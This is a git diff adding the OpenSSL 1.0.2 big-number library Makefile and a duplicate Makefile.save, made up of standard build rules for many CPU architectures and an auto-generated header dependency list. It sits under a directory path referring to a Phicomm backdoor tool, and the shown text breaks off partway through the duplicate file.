+	bn_recp.o bn_mont.o bn_mpi.o bn_exp2.o bn_gf2m.o bn_nist.o \
+	bn_depr.o bn_const.o bn_x931p.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= bn.h
+HEADER=	bn_lcl.h bn_prime.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+bn_prime.h: bn_prime.pl
+	$(PERL) bn_prime.pl >bn_prime.h
+
+divtest: divtest.c ../../libcrypto.a
+	cc -I../../include divtest.c -o divtest ../../libcrypto.a
+
+bnbug: bnbug.c ../../libcrypto.a top
+	cc -g -I../../include bnbug.c -o bnbug ../../libcrypto.a
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+bn-586.s:	asm/bn-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/bn-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+co-586.s:	asm/co-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/co-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+x86-mont.s:	asm/x86-mont.pl ../perlasm/x86asm.pl
+	$(PERL) asm/x86-mont.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+x86-gf2m.s:	asm/x86-gf2m.pl ../perlasm/x86asm.pl
+	$(PERL) asm/x86-gf2m.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+sparcv8.o:	asm/sparcv8.S
+	$(CC) $(CFLAGS) -c asm/sparcv8.S
+bn-sparcv9.o:	asm/sparcv8plus.S
+	$(CC) $(CFLAGS) -c -o $@ asm/sparcv8plus.S
+sparcv9a-mont.s:	asm/sparcv9a-mont.pl
+	$(PERL) asm/sparcv9a-mont.pl $(CFLAGS) > $@
+sparcv9-mont.s:		asm/sparcv9-mont.pl
+	$(PERL) asm/sparcv9-mont.pl $(CFLAGS) > $@
+vis3-mont.s:		asm/vis3-mont.pl
+	$(PERL) asm/vis3-mont.pl $(CFLAGS) > $@
+sparct4-mont.S:	asm/sparct4-mont.pl
+	$(PERL) asm/sparct4-mont.pl $(CFLAGS) > $@
+sparcv9-gf2m.S:	asm/sparcv9-gf2m.pl
+	$(PERL) asm/sparcv9-gf2m.pl $(CFLAGS) > $@
+
+bn-mips3.o:	asm/mips3.s
+	@if [ "$(CC)" = "gcc" ]; then \
+		ABI=`expr "$(CFLAGS)" : ".*-mabi=\([n3264]*\)"` && \
+		as -$$ABI -O -o $@ asm/mips3.s; \
+	else	$(CC) -c $(CFLAGS) -o $@ asm/mips3.s; fi
+
+bn-mips.s:	asm/mips.pl
+	$(PERL) asm/mips.pl $(PERLASM_SCHEME) $@
+mips-mont.s:	asm/mips-mont.pl
+	$(PERL)	asm/mips-mont.pl $(PERLASM_SCHEME) $@
+
+bn-s390x.o:	asm/s390x.S
+	$(CC) $(CFLAGS) -c -o $@ asm/s390x.S
+s390x-gf2m.s:	asm/s390x-gf2m.pl
+	$(PERL) asm/s390x-gf2m.pl $(PERLASM_SCHEME) $@
+
+x86_64-gcc.o:	asm/x86_64-gcc.c
+	$(CC) $(CFLAGS) -c -o $@ asm/x86_64-gcc.c
+x86_64-mont.s:	asm/x86_64-mont.pl
+	$(PERL) asm/x86_64-mont.pl $(PERLASM_SCHEME) > $@
+x86_64-mont5.s:	asm/x86_64-mont5.pl
+	$(PERL) asm/x86_64-mont5.pl $(PERLASM_SCHEME) > $@
+x86_64-gf2m.s:	asm/x86_64-gf2m.pl
+	$(PERL) asm/x86_64-gf2m.pl $(PERLASM_SCHEME) > $@
+modexp512-x86_64.s:	asm/modexp512-x86_64.pl
+	$(PERL) asm/modexp512-x86_64.pl $(PERLASM_SCHEME) > $@
+rsaz-x86_64.s:	asm/rsaz-x86_64.pl
+	$(PERL) asm/rsaz-x86_64.pl $(PERLASM_SCHEME) > $@
+rsaz-avx2.s:	asm/rsaz-avx2.pl 
+	$(PERL) asm/rsaz-avx2.pl $(PERLASM_SCHEME) > $@
+
+bn-ia64.s:	asm/ia64.S
+	$(CC) $(CFLAGS) -E asm/ia64.S > $@
+ia64-mont.s:	asm/ia64-mont.pl
+	$(PERL) asm/ia64-mont.pl $@ $(CFLAGS)
+
+# GNU assembler fails to compile PA-RISC2 modules, insist on calling
+# vendor assembler...
+pa-risc2W.o: asm/pa-risc2W.s
+	/usr/ccs/bin/as -o pa-risc2W.o asm/pa-risc2W.s
+pa-risc2.o: asm/pa-risc2.s
+	/usr/ccs/bin/as -o pa-risc2.o asm/pa-risc2.s
+parisc-mont.s:	asm/parisc-mont.pl
+	$(PERL) asm/parisc-mont.pl $(PERLASM_SCHEME) $@
+
+# ppc - AIX, Linux, MacOS X...
+bn-ppc.s:	asm/ppc.pl;	$(PERL) asm/ppc.pl $(PERLASM_SCHEME) $@
+ppc-mont.s:	asm/ppc-mont.pl;$(PERL) asm/ppc-mont.pl $(PERLASM_SCHEME) $@
+ppc64-mont.s:	asm/ppc64-mont.pl;$(PERL) asm/ppc64-mont.pl $(PERLASM_SCHEME) $@
+
+alpha-mont.s:	asm/alpha-mont.pl
+	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
+	$(PERL) asm/alpha-mont.pl > $$preproc && \
+	$(CC) -E -P $$preproc > $@ && rm $$preproc)
+
+# GNU make "catch all"
+%-mont.S:	asm/%-mont.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+%-gf2m.S:	asm/%-gf2m.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+
+armv4-mont.o:	armv4-mont.S
+armv4-gf2m.o:	armv4-gf2m.S
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+exptest:
+	rm -f exptest
+	gcc -I../../include -g2 -ggdb -o exptest exptest.c ../../libcrypto.a
+
+div:
+	rm -f a.out
+	gcc -I.. -g div.c ../../libcrypto.a
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bn_add.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_add.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_add.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_add.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_add.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_add.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_add.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_add.c bn_lcl.h
+bn_asm.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_asm.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_asm.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_asm.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_asm.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_asm.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_asm.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_asm.c bn_lcl.h
+bn_blind.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_blind.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_blind.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_blind.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_blind.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_blind.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_blind.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_blind.c bn_lcl.h
+bn_const.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bn_const.o: ../../include/openssl/opensslconf.h
+bn_const.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_const.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_const.o: ../../include/openssl/symhacks.h bn.h bn_const.c
+bn_ctx.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_ctx.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_ctx.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_ctx.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_ctx.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_ctx.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_ctx.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_ctx.c bn_lcl.h
+bn_depr.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_depr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_depr.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_depr.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_depr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_depr.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+bn_depr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bn_depr.o: ../cryptlib.h bn_depr.c bn_lcl.h
+bn_div.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_div.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_div.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_div.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_div.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_div.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_div.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_div.c bn_lcl.h
+bn_err.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bn_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+bn_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bn_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+bn_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bn_err.o: bn_err.c
+bn_exp.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_exp.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_exp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_exp.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_exp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_exp.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_exp.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_exp.c bn_lcl.h
+bn_exp2.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_exp2.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_exp2.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_exp2.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_exp2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_exp2.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_exp2.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_exp2.c bn_lcl.h
+bn_gcd.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_gcd.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_gcd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_gcd.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_gcd.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_gcd.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_gcd.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_gcd.c bn_lcl.h
+bn_gf2m.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_gf2m.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_gf2m.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_gf2m.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_gf2m.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_gf2m.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_gf2m.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_gf2m.c bn_lcl.h
+bn_kron.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_kron.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_kron.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_kron.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_kron.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_kron.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_kron.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_kron.c bn_lcl.h
+bn_lib.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_lib.c
+bn_mod.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_mod.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_mod.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_mod.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_mod.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_mod.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_mod.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_mod.c
+bn_mont.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_mont.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_mont.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_mont.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_mont.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_mont.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_mont.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_mont.c
+bn_mpi.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_mpi.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_mpi.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_mpi.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_mpi.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_mpi.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_mpi.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_mpi.c
+bn_mul.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_mul.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_mul.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_mul.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_mul.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_mul.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_mul.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_mul.c
+bn_nist.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_nist.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_nist.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_nist.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_nist.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_nist.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_nist.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_nist.c
+bn_prime.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_prime.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_prime.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_prime.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_prime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_prime.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+bn_prime.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bn_prime.o: ../cryptlib.h bn_lcl.h bn_prime.c bn_prime.h
+bn_print.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_print.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_print.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_print.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_print.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_print.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_print.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_print.c
+bn_rand.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_rand.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_rand.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_rand.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_rand.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_rand.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+bn_rand.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bn_rand.o: ../cryptlib.h bn_lcl.h bn_rand.c
+bn_recp.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_recp.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_recp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_recp.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_recp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_recp.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_recp.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_recp.c
+bn_shift.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_shift.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_shift.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_shift.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_shift.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_shift.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_shift.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_shift.c
+bn_sqr.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_sqr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_sqr.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_sqr.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_sqr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_sqr.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_sqr.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_sqr.c
+bn_sqrt.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_sqrt.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_sqrt.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_sqrt.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_sqrt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_sqrt.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_sqrt.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_sqrt.c
+bn_word.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_word.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_word.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_word.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_word.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_word.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_word.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_word.c
+bn_x931p.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+bn_x931p.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+bn_x931p.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_x931p.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_x931p.o: ../../include/openssl/symhacks.h bn_x931p.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/Makefile.save
new file mode 100644
index 0000000..0cdbd20
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/Makefile.save
@@ -0,0 +1,388 @@
+#
+# OpenSSL/crypto/bn/Makefile
+#
+
+DIR=	bn
+TOP=	../..
+CC=	cc
+CPP=    $(CC) -E
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+BN_ASM=		bn_asm.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=bntest.c exptest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	bn_add.c bn_div.c bn_exp.c bn_lib.c bn_ctx.c bn_mul.c bn_mod.c \
+	bn_print.c bn_rand.c bn_shift.c bn_word.c bn_blind.c \
+	bn_kron.c bn_sqrt.c bn_gcd.c bn_prime.c bn_err.c bn_sqr.c bn_asm.c \
+	bn_recp.c bn_mont.c bn_mpi.c bn_exp2.c bn_gf2m.c bn_nist.c \
+	bn_depr.c bn_const.c bn_x931p.c
+
+LIBOBJ=	bn_add.o bn_div.o bn_exp.o bn_lib.o bn_ctx.o bn_mul.o bn_mod.o \
+	bn_print.o bn_rand.o bn_shift.o bn_word.o bn_blind.o \
+	bn_kron.o bn_sqrt.o bn_gcd.o bn_prime.o bn_err.o bn_sqr.o $(BN_ASM) \
+	bn_recp.o bn_mont.o bn_mpi.o bn_exp2.o bn_gf2m.o bn_nist.o \
+	bn_depr.o bn_const.o bn_x931p.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= bn.h
+HEADER=	bn_lcl.h bn_prime.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+bn_prime.h: bn_prime.pl
+	$(PERL) bn_prime.pl >bn_prime.h
+
+divtest: divtest.c ../../libcrypto.a
+	cc -I../../include divtest.c -o divtest ../../libcrypto.a
+
+bnbug: bnbug.c ../../libcrypto.a top
+	cc -g -I../../include bnbug.c -o bnbug ../../libcrypto.a
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+bn-586.s:	asm/bn-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/bn-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+co-586.s:	asm/co-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/co-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+x86-mont.s:	asm/x86-mont.pl ../perlasm/x86asm.pl
+	$(PERL) asm/x86-mont.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+x86-gf2m.s:	asm/x86-gf2m.pl ../perlasm/x86asm.pl
+	$(PERL) asm/x86-gf2m.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+sparcv8.o:	asm/sparcv8.S
+	$(CC) $(CFLAGS) -c asm/sparcv8.S
+bn-sparcv9.o:	asm/sparcv8plus.S
+	$(CC) $(CFLAGS) -c -o $@ asm/sparcv8plus.S
+sparcv9a-mont.s:	asm/sparcv9a-mont.pl
+	$(PERL) asm/sparcv9a-mont.pl $(CFLAGS) > $@
+sparcv9-mont.s:		asm/sparcv9-mont.pl
+	$(PERL) asm/sparcv9-mont.pl $(CFLAGS) > $@
+vis3-mont.s:		asm/vis3-mont.pl
+	$(PERL) asm/vis3-mont.pl $(CFLAGS) > $@
+sparct4-mont.S:	asm/sparct4-mont.pl
+	$(PERL) asm/sparct4-mont.pl $(CFLAGS) > $@
+sparcv9-gf2m.S:	asm/sparcv9-gf2m.pl
+	$(PERL) asm/sparcv9-gf2m.pl $(CFLAGS) > $@
+
+bn-mips3.o:	asm/mips3.s
+	@if [ "$(CC)" = "gcc" ]; then \
+		ABI=`expr "$(CFLAGS)" : ".*-mabi=\([n3264]*\)"` && \
+		as -$$ABI -O -o $@ asm/mips3.s; \
+	else	$(CC) -c $(CFLAGS) -o $@ asm/mips3.s; fi
+
+bn-mips.s:	asm/mips.pl
+	$(PERL) asm/mips.pl $(PERLASM_SCHEME) $@
+mips-mont.s:	asm/mips-mont.pl
+	$(PERL)	asm/mips-mont.pl $(PERLASM_SCHEME) $@
+
+bn-s390x.o:	asm/s390x.S
+	$(CC) $(CFLAGS) -c -o $@ asm/s390x.S
+s390x-gf2m.s:	asm/s390x-gf2m.pl
+	$(PERL) asm/s390x-gf2m.pl $(PERLASM_SCHEME) $@
+
+x86_64-gcc.o:	asm/x86_64-gcc.c
+	$(CC) $(CFLAGS) -c -o $@ asm/x86_64-gcc.c
+x86_64-mont.s:	asm/x86_64-mont.pl
+	$(PERL) asm/x86_64-mont.pl $(PERLASM_SCHEME) > $@
+x86_64-mont5.s:	asm/x86_64-mont5.pl
+	$(PERL) asm/x86_64-mont5.pl $(PERLASM_SCHEME) > $@
+x86_64-gf2m.s:	asm/x86_64-gf2m.pl
+	$(PERL) asm/x86_64-gf2m.pl $(PERLASM_SCHEME) > $@
+modexp512-x86_64.s:	asm/modexp512-x86_64.pl
+	$(PERL) asm/modexp512-x86_64.pl $(PERLASM_SCHEME) > $@
+rsaz-x86_64.s:	asm/rsaz-x86_64.pl
+	$(PERL) asm/rsaz-x86_64.pl $(PERLASM_SCHEME) > $@
+rsaz-avx2.s:	asm/rsaz-avx2.pl 
+	$(PERL) asm/rsaz-avx2.pl $(PERLASM_SCHEME) > $@
+
+bn-ia64.s:	asm/ia64.S
+	$(CC) $(CFLAGS) -E asm/ia64.S > $@
+ia64-mont.s:	asm/ia64-mont.pl
+	$(PERL) asm/ia64-mont.pl $@ $(CFLAGS)
+
+# GNU assembler fails to compile PA-RISC2 modules, insist on calling
+# vendor assembler...
+pa-risc2W.o: asm/pa-risc2W.s
+	/usr/ccs/bin/as -o pa-risc2W.o asm/pa-risc2W.s
+pa-risc2.o: asm/pa-risc2.s
+	/usr/ccs/bin/as -o pa-risc2.o asm/pa-risc2.s
+parisc-mont.s:	asm/parisc-mont.pl
+	$(PERL) asm/parisc-mont.pl $(PERLASM_SCHEME) $@
+
+# ppc - AIX, Linux, MacOS X...
